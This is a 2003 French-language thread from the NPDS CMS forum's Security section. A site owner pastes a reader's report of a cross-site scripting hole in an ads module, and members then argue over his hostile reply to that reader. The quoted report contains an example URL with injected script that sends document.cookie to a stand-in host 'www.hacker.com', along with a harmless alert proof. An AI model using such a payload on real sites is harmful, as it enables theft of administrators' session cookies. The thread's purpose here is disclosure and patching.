Gestion de Contenu, de Communauté et de groupes de travail collaboratif - Open Source, français, sécurisé, stable et performant

  • MODULES

    Pour étendre les nombreuses fonctionnalités disponibles de base - modules.npds.org est à votre disposition.

    Des modules complémentaires, une communauté de développeurs active, des forums pour vos questions ... NPDS  est aussi une plateforme de développement !
  • STYLES

    Vous cherchez des thèmes graphiques pour votre portail ou votre communauté : styles.npds.org est à votre disposition.

    Des thèmes du plus simple au plus sophistiqué. Des thèmes facilement modifiables et toujours en Open-Source - Laissez simplement parler votre imagination !
  • BIBLES

    La documentation indispensable pour personnaliser et exploiter toute la puissante de NPDS  est à votre disposition sur bible.npds.org.

    Vous pouvez participer à l'effort de documentation - rien de plus simple : contactez un membre de la Team de développement et nous vous ouvrirons un compte sur le Wiki !
Devenir membre    |    Identifiant : Mot de Passe : -
Au delà de la gestion de contenu 'classique', NPDS met en oeuvre un ensemble de fonctions spécifiquement dédiées à la gestion de Communauté et de groupes de travail collaboratif.
Il s'agit d'un Content & Community Management System (CCMS) robuste, sécurisé, complet, performant et parlant vraiment français.

Gérez votre Communauté d'utilisateurs, vos groupes de travail collaboratif, publiez, gérez et organisez votre contenu grâce aux puissants outils disponibles de base.
  • Multi langues (Français, Anglais, Allemand, Espagnol, Chinois)
  • Respect des standards : UTF8, XHTML, CSS, ...
  • Système de blocs avancés
  • Installation et administration complète et centralisée
  • Editeur HTML intégré
  • Gestionnaire de fichier en ligne
  • Gestion des groupes de membres
  • Ecriture collaborative de documents (PAD)
  • Forums évolués
  • Mini-sites (pour les membres et les groupes de travail)
  • Chat temp réel
  • Système de News et de rubriques complet (édition, révision, publication)
  • ...
Gratuit et libre (Open-Source), développé en PHP, NPDS est personnalisable grâce à de nombreux thèmes et modules et ne requiert que quelques compétences de base.
NPDS Workplace - groupe de travail collaboratif
 NPDS WorkSpace - tous l'univers du travail collaboratif.
Modéré par : developpeur jpb Jireck 
Index du Forum » » Sécurité » » [Résolu] - Faille supposée
3 pages [ 1 | 2 | 3 ]
Auteur[Résolu] - Faille supposée
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 11:04

message reçu via le formulaire du site:

**** Message *****
>From : nosp1@hotmail.com
Code : 75000
Sujet : problème de sécurité
Msg : Bonjour,
Il semblerait qu\'il existe un problème de sécurité sur votre site en effet la variable : \"categorie\" dans module.php ne semble pas être défini par défaut et de surcroit pas modifié en passant dans les formulaire avec htmlspecialchars par exemple de plus cette variable étant active sur la page grace à un echo, je suppose, elle permet de faire executer du javascrit à celle-ci. Tout ceci ajouté à une identification permettrait à une personne mal intentionné de récupérer un cookie d\'un admin du site, grace à un mail malformé ou suivi d\'un lien du genre http://www.lesite.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>windowd.location.replace(\'http://www.hacker.com\'+!document.cookie!);</script>&num_ann=5
En espératn à vous avoir aidé quelques peu.
Cordialement

NoSP

Le lien ci-dessous ne fais rien d\'autre que d\'afficher votre cookie sur la page si vous êtes identifié, il est destiné à vous montrer le problème :

http://www.aidadomicil.com/modules.php?ModPath=annonces&ModStart=list_ann&id_cat=2&categorie=<script>alert(!document.cookie!)</script>&num_ann=5
**** Fin du message ****

  Profil  www  
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 11:19

y commencent à faire ch...r tous ces redresseurs de sites... on ne leur demande rien de quoi se mèlent-ils... j'ai installé ipban de la v5.0 et bloqué le dns du gus

  Profil  www  
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 15:02

Copie de la réponse faite au gugusse:

Si nous avons besoin d'un audit de sécurité sur notre site internet, nous en ferons volontairement la démarche auprès d'un service spécialisé, en supposant que cela en vaille la peine. Qui y a-t-il à prendre ou à détruire sur Aid@domicil ? en admettant que celà soit possible, pensez-vous que l'on puisse mettre un baton de dynamite sur le serveur qui nous héberge?
N'avez-vous pas d'autres sites à taquiner ? Un gros site professionnel par exemple, ce serait probablement plus intéressant, non ? Pourquoi emmerder des sites comme le nôtre ?
Pour la peine de nous avoir pollué notre samedi matin, nous considérons votre action comme une tentative d'intrusion et de destruction de nos données placée chez notre hébergeur. Nous conservons les logs de votre passage et de vos actions et en informerons votre fournisseur d'accès. Nous avons l'intention de déposer plainte dès que vos coordonnées personnelles nous serons connues.
Cette plainte n'aboutira probablement pas, mais elle vous obligera à donner des explications auprès des autorités de police ou de gendarmerie, pendant ce temps-là vous vous ne nuirez à personne.
A ne plus vous revoir sur notre site...

  Profil  www  
Xargos
2035       

Xargos
  Posté : 21-06-2003 15:51

C'est pas très sympa tout ça... le type en question n'avait visiblement pas de mauvaises intentions et voulait juste t'aider à corriger la faille avant qu'un vrai pirate méchant ne s'en prenne réellement au site. Même si tu ne comptes pas t'occuper du bug, tu aurais au moins pu le remercier de t'avoir prévenu...

  Profil  E-mail  www  
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 15:55

j'ai pour habitude d'essayer de n'emmerder personne et j'aimerais bien que les gens fassent pareil pour moi...

  Profil  www  
Xargos
2035       

Xargos
  Posté : 21-06-2003 16:18

Je suis d'accord. Mais je pense que le gus en question voulait bien faire et qu'il n'avait pas l'intention de t'emmerder mais de t'aider.

  Profil  E-mail  www  
axel
10065       
 

axel
  Posté : 21-06-2003 16:22

je vote comme Xargos..

  Profil  E-mail  www  
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 16:40

heh j'ai pas le droit d'être de mauvaise foi ???
je pense avoir joué mon rôle, j'ai transmis l'info à Dev via ce forum et à la communauté, à mon hébergeur à toutes fins utiles et espère avoir perturbé le gugusse pour qu'il aille faire ses éssais de hack ailleurs que chez moi.
Avec ses co...ries, j'ai fermé l'inscription aux membres et bloqué son DNS, comme ça je me bloque l'accès de tous ceux qui viennent du même fournisseur d'accès que lui et il faudrait que je sois content, et ben non je ne le suis pas et je le lui fait remarquer, c'est tout!

  Profil  www  
developpeur
24581       
 

developpeur
  Posté : 21-06-2003 17:17

aida : refile moi le dernier niveau du module annonce que je vérifie le niveau de sécurité. Je modifie cela et te le renvoi immédiatement, comme cela le trou de ce module sera fermé.

On fera une MAJ de modules.npds.org avec cela

Je ne pense pas que le gus te voulais du mal mais il vos mieux sécurisé ce module effectivement.

A suivre


  Profil  E-mail  www  
aidadomicil
3011       

aidadomicil
  Posté : 21-06-2003 17:31

ok je te le maile

  Profil  www  
PSTL
2716       
 

PSTL
  Posté : 22-06-2003 17:56

Pour le module en question j'ai passé la main a glolo et lolo le temps pour moi de refaire surface.
Ils sont en train de fignoler la nouvelle version à sortir et si faille il y a le mieux serait de les en informer dans le forum du module (si cela n'est pas déjà fait )


  Profil  E-mail  
aidadomicil
3011       

aidadomicil
  Posté : 22-06-2003 18:23

c'est pas le même que le tien, Pstl, t'inquiète pas

  Profil  www  
PSTL
2716       
 

PSTL
  Posté : 22-06-2003 22:13

ok oui je me rappelle
A voir qd meme si ce pb peut pas concerner d'autres modules d'annonces un peu similaires

  Profil  E-mail  
aidadomicil
3011       

aidadomicil
  Posté : 23-06-2003 00:27

sûrement et pas que les annonces!

  Profil  www  
rolmops
4  

rolmops
  Posté : 25-06-2003 02:03

J'arrive comme un cheveux sur la soupe mais personnelement je penses que ce gus ne te voulait pas de mal puisqu'il te met au courant du probleme. Je rajouterais de surcroit qu'il est heureux qu'il existe des personnes de ce genre pour mettre en avant des failles pouvant etres reprises par des personnes moin bien intentionnées .
Sans cette intervention ce probleme serait passé inapercu pendant combien de temps ?
Finalement il fait avancer le shmilblick a sa facon


[ Message édité par : rolmops : 25-06-2003 02:15 ]

  Profil  www  
Aller à la page : [ 1 | 2 | 3 ]
Sauter à :

Temps : 0.0186 seconde(s)